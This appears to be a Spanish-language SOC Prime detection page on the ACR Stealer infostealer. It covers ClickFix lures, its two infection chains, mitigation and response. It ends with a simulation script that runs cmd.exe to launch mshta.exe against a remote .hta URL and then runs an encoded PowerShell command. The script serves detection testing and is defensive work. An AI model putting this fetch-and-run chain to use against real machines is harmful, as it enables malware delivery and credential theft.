SOC Prime Bias: Alto

20 Jul 2026 06:25 UTC

ACR Stealer: Dos Cadenas de Intrusión Observadas Durante Aumento de Actividad de Amenazas

Author Photo
SOC Prime Team linkedin icon Seguir
ACR Stealer: Dos Cadenas de Intrusión Observadas Durante Aumento de Actividad de Amenazas
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

ACR Stealer es una familia de malware que roba información utilizando señuelos de ingeniería social de estilo ClickFix para atacar entornos empresariales. El malware opera a través de dos cadenas principales de infección: una que depende de cargas útiles entregadas por WebDAV con cargadores de Python y comando y control basado en blockchain, y otra que utiliza MSHTA con entrega de cargas útiles esteganográficas. Su objetivo principal es robar credenciales de navegadores, tokens de autenticación y documentos sensibles.

Investigación

Microsoft Defender Experts observó un aumento de actividad entre finales de abril y mediados de junio de 2026. La investigación identificó dos caminos de ejecución separados: una campaña basada en disco que involucra Python y tareas programadas, y una campaña sin archivos que utiliza MSHTA y ejecución de shellcode en memoria. Los analistas también documentaron métodos avanzados de evasión, incluyendo modificación de marcas de tiempo, PowerShell ofuscado y resolutores de caída muertos respaldados por blockchain.

Mitigación

Las organizaciones deben capacitar a los usuarios para reconocer los mensajes de ClickFix y restringir la ejecución de scripts no confiables a través del control de aplicaciones. Reducir la exposición a la publicidad malintencionada y aplicar filtros web puede ayudar a interrumpir los intentos de acceso inicial. Fortalecer los puntos finales limitando la dependencia de credenciales almacenadas en el navegador y aplicando la autenticación multifactor también es esencial para reducir el riesgo de robo de credenciales.

Respuesta

Si se detecta esta actividad, los dispositivos afectados deben ser aislados inmediatamente y todas las credenciales y tokens potencialmente comprometidos deben ser rotados. Los tokens de sesión deben ser revocados y los investigadores deben revisar las conexiones salientes a recursos compartidos remotos o servicios de alojamiento de imágenes sospechosos. EDR en modo bloqueo debe ser utilizado para contener la amenaza y eliminar eficientemente los artefactos maliciosos.

Flujo de Ataque

Ejecución de Simulación

Prerrequisito: La Verificación Pre-vuelo de Telemetría y Línea Base debe haber pasado.

Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente las TTPs identificadas y tienen como objetivo generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.

  • Narrativa y Comandos del Ataque: El adversario apunta a un usuario con un falso ‘error del navegador’ (ClickFix). Una vez que el usuario copia y pega el comando en un terminal, cmd.exe se invoca. El comando instruye a mshta.exe para acceder a una URL remota y recuperar un script malicioso. Para evadir más fácilmente la detección de cadenas simples, el script utiliza powershell.exe con un comando codificado (-Enc) para descargar y ejecutar el malware ACR Stealer en memoria, evitando el escaneo tradicional basado en archivos.

  • Script de Prueba de Regresión:

    # Simulación de Cadena ClickFix de ACR Stealer
    # Paso 1: Simular el envoltorio cmd.exe
    # Paso 2: Invocar mshta.exe con una URL
    # Paso 3: Seguido de un comando PowerShell codificado
    
    $encodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Write-Host 'Simulando Ejecución de Carga Útil de ACR Stealer'"))
    
    Start-Process "cmd.exe" -ArgumentList "/c mshta.exe https://example.com/payload.hta & powershell.exe -Enc $encodedCommand"
  • Comandos de Limpieza:

    # No se crean archivos persistentes en esta simulación, pero asegúrese de que no queden procesos huérfanos
    Stop-Process -Name "mshta" -ErrorAction SilentlyContinue
    Stop-Process -Name "powershell" -ErrorAction SilentlyContinue